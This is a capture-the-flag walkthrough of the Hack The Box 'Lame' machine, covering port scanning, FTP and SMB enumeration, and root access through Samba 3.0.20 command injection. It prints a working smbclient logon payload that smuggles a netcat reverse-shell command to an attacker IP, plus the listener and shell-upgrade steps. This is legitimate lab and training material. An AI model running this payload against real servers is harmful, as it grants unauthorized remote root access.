Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.
Reconnaissance
Let’s start with an Nmap scan to identify open ports
Nmap scan shows the following output with 5 open ports:
nmap -sC -sV -T5 10.10.10.3 -oA nmap_initial
kali㉿kali)-[~/HTB/Lame]
└─$ nmap -sC -sV -T5 -Pn -p- 10.10.10.3 -oA initscan_lame
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-23 23:51 EDT
Nmap scan report for 10.10.10.3
Host is up (0.058s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.16.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-08-23T23:53:53-04:00
|_clock-skew: mean: 2h00m22s, deviation: 2h49m45s, median: 19s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.68 seconds
Enumeration
FTP Anonymous Login
I attempted to log in anonymously to the FTP service, but all the directories were empty.
kali㉿kali)-[~/HTB/Lame]
└─$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||63947|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||37980|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> status
Connected and logged into 10.10.10.3.
No proxy connection.
Gate ftp: off, server (none), port ftpgate.
Passive mode: on; fallback to active mode: on.
Mode: stream; Type: binary; Form: non-print; Structure: file.
Verbose: on; Bell: off; Prompting: on; Globbing: on.
Store unique: off; Receive unique: off.
Preserve modification times: on.
Case: off; CR stripping: on.
Ntrans: off.
Nmap: off.
Hash mark printing: off; Mark count: 1024; Progress bar: on.
Get transfer rate throttle: off; maximum: 0; increment 1024.
Put transfer rate throttle: off; maximum: 0; increment 1024.
Socket buffer sizes: send 16384, receive 131072.
Use of PORT cmds: on.
Use of EPSV/EPRT cmds for IPv4: on.
Use of EPSV/EPRT cmds for IPv6: on.
Command line editing: on.
Version: tnftp 20230507
Attempts to run a Metasploit exploit were unsuccessful.
SMB
Next, let’s enumerate the SMB services without using Metasploit.
smbmap -H 10.10.10.3 shows the following available shares where tmp got both read and write access.
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.10.3:445 Name: 10.10.10.3 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
Let’s anonymous logon to it with the help of smbclient.
smbclient //10.10.10.3/tmp
Since this version of samba is vulnerable to RCE, we will set up a listener to receive a reverse shell. .
kali㉿kali)-[~/HTB/Lame]
└─$ nc -lvp 1337
listening on [any] 1337 ...
Lets use the logon command on the smbclient which establishes a new vuid for this session by logging on again.
session setup failed: NT_STATUS_LOGON_FAILURE
smb: \> logon "/=`nc 10.10.16.7 1337 -e /bin/sh`"
Password:
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \>
Going back to the netcat listener, we can see the following output.
nc -vlp 1337
listening on [any] 1337 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.3] 50988
whoami
root
After gaining access, we can upgrade our shell and look for user and root level access.
python -c 'import pty; pty.spawn("bash")'
root@lame:/# ls
ls
bin etc initrd.img.old mnt root tmp vmlinuz.old
boot home lib nohup.out sbin usr
cdrom initrd lost+found opt srv var
dev initrd.img media proc sys vmlinuz
root@lame:/# cd home
cd home
root@lame:/home# ls
ls
ftp makis service user
root@lame:/home# cd makis
cd makis
root@lame:/home/makis# ls
ls
user.txt
root@lame:/home/makis# cat user.txt
cat user.txt
de.........................
root@lame:/home/makis# cd ..
cd ..
root@lame:/home# ls
ls
ftp makis service user
root@lame:/home# cd ..
cd ..
root@lame:/# ls
ls
bin etc initrd.img.old mnt root tmp vmlinuz.old
boot home lib nohup.out sbin usr
cdrom initrd lost+found opt srv var
dev initrd.img media proc sys vmlinuz
root@lame:/# cd root
cd root
root@lame:/root# ls
ls
Desktop reset_logs.sh root.txt vnc.log
root@lame:/root# cat root.txt
cat root.txt
d438....................
root@lame:/root# id
id
uid=0(root) gid=0(root)
As an alternative, using metasploit by searching the exploitable version and setting up the required options also gets us root access to the system.